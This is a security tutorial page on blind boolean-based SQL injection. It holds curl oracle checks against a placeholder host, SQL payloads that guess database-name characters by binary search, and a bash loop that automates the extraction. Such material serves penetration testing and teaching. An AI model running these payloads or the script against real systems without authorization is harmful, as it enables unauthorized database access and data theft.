Blind Boolean-Based SQL Injection


CWE	CWE-89
Tools	sqlmap, ghauri
Difficulty	🔴 advanced

Boolean-based blind injection extracts data one bit at a time by asking true/false questions and observing response differences. Use this when query results are not directly reflected but response content differs.

Establish the Oracle

# True response (note response length or content)
curl "https://target.com/api?id=1 AND 1=1" -o true_response.txt

# False response
curl "https://target.com/api?id=1 AND 1=2" -o false_response.txt

# Compare
diff true_response.txt false_response.txt

Extract Data Character by Character

Use binary search to efficiently determine each character:

-- Is first character of database name > 'm' (ASCII 109)?
' AND SUBSTRING(DATABASE(),1,1)>'m'--

-- Binary search approach:
' AND ASCII(SUBSTRING(DATABASE(),1,1))>64--   -- Greater than '@'?
' AND ASCII(SUBSTRING(DATABASE(),1,1))>96--   -- Greater than '`'?
' AND ASCII(SUBSTRING(DATABASE(),1,1))>112--  -- Greater than 'p'?
' AND ASCII(SUBSTRING(DATABASE(),1,1))>104--  -- Greater than 'h'?
-- Continue until exact character is identified

Automated Extraction Pattern

#!/bin/bash
# Extract database name character by character
extracted=""
for pos in $(seq 1 20); do
    for char in $(seq 32 126); do
        response=$(curl -s "https://target.com/api?id=1' AND ASCII(SUBSTRING(DATABASE(),$pos,1))=$char--")
        if echo "$response" | grep -q "expected_pattern"; then
            extracted="${extracted}$(printf "\\x$(printf '%02x' $char)")"
            echo "Position $pos: $(printf "\\x$(printf '%02x' $char)") | Full: $extracted"
            break
        fi
    done
done
echo "Database name: $extracted"

Blind Extraction -- Boolean-Based​

Establish the Oracle​

Extract Data Character by Character​

Automated Extraction Pattern​

Blind Extraction -- Boolean-Based

Establish the Oracle

Extract Data Character by Character

Automated Extraction Pattern